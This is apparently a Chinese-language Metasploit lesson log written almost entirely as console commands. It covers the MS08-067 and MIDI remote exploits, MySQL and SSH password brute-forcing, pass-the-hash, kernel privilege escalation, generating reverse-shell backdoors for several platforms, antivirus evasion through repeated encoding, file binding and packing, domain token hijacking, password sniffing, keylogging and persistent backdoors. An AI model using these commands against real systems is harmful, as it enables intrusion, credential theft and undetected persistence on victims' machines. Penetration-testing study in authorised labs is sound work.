Read Time:4 Minute, 13 Second
### 课时1 Metasploit之远程代码执行 漏洞:ms08067 靶机:xp sp2 msf > search 08-067 msf > use exploit/windows/smb/ms08-067_netapi msf > show options msf > set RHOST 192.168.0.6 msf > show options msf > show payloads //设置载荷,反弹回shell msf > set payload windows/meterpreter/reverse_tcp msf > show option msf > set LHOST 127.0.0.1 //对载荷设置 msf > show options msf > info //查看信息,影响的版本,第一种 msf > nmap -O 192.168.0.6 //扫描主机,查看版本 msf > show targets //第二种方法 msf > set target 17 //影响的版本,对应的序号; //只有08-067不识别版本号 msf > show options msf > exploit //执行攻击 msf > shell //反弹后获取shell cmd > whoami cmd > net user admin admin /add //添加用户 cmd > net user //查看用户 cmd > net user admin /del //删除用户 ### 课时2 Metasploit之MIDI文件解析远程代码执行 windows xp 靶机 msf > search 12-004 msf > use exploit/windows/browser/ms12_004_midi msf > show options msf > set SRVHOST 127.0.0.1 msf > exploit //生成 msf > set URLPATH / //设置路径 msf > exploit 鱼点击链接后,在岸上有个会话,但不会直接显示;需要查看 msf > sessions -i 1 //会话的id为1 msf > shell cmd > ipconfig ### 课时3 Metasploit之口令安全 弱口令问题 - 存在的"隐患" - 如何用msf去检测 > 先启动mysql msf > search mysql_login msf > use auxiliary/scanner/mysql/mysql_login msf > show options msf > set RHOSTS 192.168.0.6 msf > set USERNAME root //可以指定文件作为用户名字典 msf > set PASS_FILE /root/1.txt msf > set THREADS 50 msf > exploit //进行攻击,破解成功立即终止 msf > search ssh_login msf > use auxiliary/scanner/ssh/ssh_login msf > show options msf > set RHOSTS 192.168.0.6 msf > set USERNAME root msf > set PASS_FILE /root/1.txt msf > set THREADS 50 msf > exploit ### 课时4 Metasploit之Hash值传递渗透 1. 不知道密码的情况下 获取shell之后,使用 `m > hashdump` 2. 知道密码,直接登录 > msf > use exploit/windows/smb/psexec msf > show options 一 msf > set RHOST 192.168.0.6 msf > set SMBUSER wing //用户名 msf > exploit m > hashdump 二 获取hash值后可以登陆 msf > set smbpass HashValue //设置密码Hash可以直接登录 msf > exploit ### 课时5 Metasploit之NDProxy内核提权 提权的前提是必须有一个会话 编号? msf > search 14-002 msf > use exploit/windows/local/ms_ndproxy //提升权限 ,点击pdf触发 msf > show options msf > set session 1 msf > exploit m > getuid //查看权限 m > getsystem ### 课时6 Metasploit之多种后门生成 - Windows后门 - Linux后门 - Java后门 - Php后门 - Jsp后门 - Asp后门 - Aspx后门 - Android后门 `msf > show payloads //查看载荷` - **Windows 后门生成** > root@shuoed:~# msfpayload windows/meterpreter/reverse_tcp LHOST = 127.0.0.1 LRORT=123 x >/root/123.exe //调用windows载荷,生成windows后门;再放置到目标机 > msf > search handler //设置监听程序,接受反弹的shell msf > use exploit/multi/handler msf > show options //查看需要设置什么选项 msf > set payload windows/meterpreter/reverse_tcp //设置payload msf > show options msf > set LHOST 127.0.0.1 msf > set LPORT 123 msf > exploit //开始监听 win > 运行123.exe程序 msf反弹回shell m > - **Linux后门生成** > root@shuoed:~# msfpayload linux/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=321 x>/root/linuxM //调用linux载荷,生成linux木马后门;再放置到目标机 生成的木马在当前目录下 root@shuoed:~# chmod 777 /root/linuxM //赋予权限 也生可成一个dll文件 - **生成一个java后门** > root@shuoed:~# msfpayload java/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1111 w>123.jar - **生成一个php后门** > root@shuoed:~# msfpayload php/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=222 R | msfencode -e php/base64 -t raw -o 123.php 上传该文件到网站,访问该文件; 在127机设置监听,即可反弹shell - **生成Android后门** > root@shuoed:~# msfpayload android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=333 R >1.apk ### 课时7 Metasploit之内网渗透 获得shell,需要对C端进行一次扫描 m > run get_local_subnets //获得网卡信息 192.168.6.0/255.255.254.0 m > run autoroute -s 192.168.6.0/24 //扫描C段 m > run autoroute -P - 存在域环境 > // 查看域环境,显示域环境 `cmd > net view` // 域渗透,在msf中劫持域管理 m > use incognito //调用模块 m > list_tokens -u //查看域 // 发现域管理 ADMIN-66DDA0F56\Zadmin m > impersonate_token ADMIN-66DDA0F56\Zadmin // 劫持成功后 m > shell cmd > - 没有域环境 > msf > use auxiliary/sniffer/psunffle //调用模块 msf > run //嗅探密码 win端操作,例如ftp服务器,进行FTP访问 滚屏显示,成功捕获到的密码 查看是否可以嗅探到http的访问信息 ### 课时8 Metasploit之反反病毒(免杀) 1. 归纳一下免杀的例子 - 加壳、改壳、加花指令->无特征码免杀 - 有特征码(找到特征码的位置)、汇编、源码改掉 - 手动免杀比Metasploit效果好 2. Metasploit是如何做的 编码的方式,对文件进行免杀;企业版效果好,免费版烂。 免杀方法: root@shuoed:~# msfpayload windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=1234 R | msfencode -e x86/shikata_ga_nai -t exe >123.exe //一次免杀编码,效果不好 www.virscan.org //世界杀毒网进行检测 查看有哪些编码可以供使用: root@shuoed:~# msfencode -l 编码可以重复、组合使用 root@shuoed:~# msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1234 R | msfencode -e x86/shikata_ga_nai -c 10 -t raw | masfencode -e x86/countdown -c 6 -t exe -o /1231.exe 绑定一个正常的文件 root@shuoed:~# msfpayload windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=1234 R | msfencode -t exe -x /root/ftp.exe -o 123123.exe -e x86/shikata_ga_nai -k -c 10 加壳 > root@shuoed:~# upx -5 /1231.exe ### 课时9 Metasploit之玩转不一样的xss msf > search keylogger msf > use auxiliary/server/capture/http_javascript_keylogger msf > show options msf > set DEMO true msf > set URIPATH / msf > set srvport 80 msf > run //即可生成一个url ### 课时10 Metasploit之维持访问(后门) 前提是要有一个会话;溢出攻击、ssh等; shellcode连接主机 msf > use exploit/multi/handler msf > set payload windows/meterpreter/reverse_tcp msf > show option msf > set LHOST 127.0.0.1 msf > set LPORT 1111 msf > run 靶机运行程序 即可获得反弹的会话 m > run metsvc -A //设置后门 一段时间后再次访问该肉鸡 msf > use exploit/multi/handler //同样的模块;不同的载荷 msf > set payload windows/metsvc_bind_tcp msf > show options msf > set LPORT 31337 //设置后门时显示的端口 msf > set RHOST 192.168.0.6 //对方的地址 msf > exploit m > ps m > getuid 第二种方法,通过键盘记录 查看有哪些用户 cmd > net user m > keyscan_start m >keyscan_dump //查看记录 //上传程序 m > shell cmd >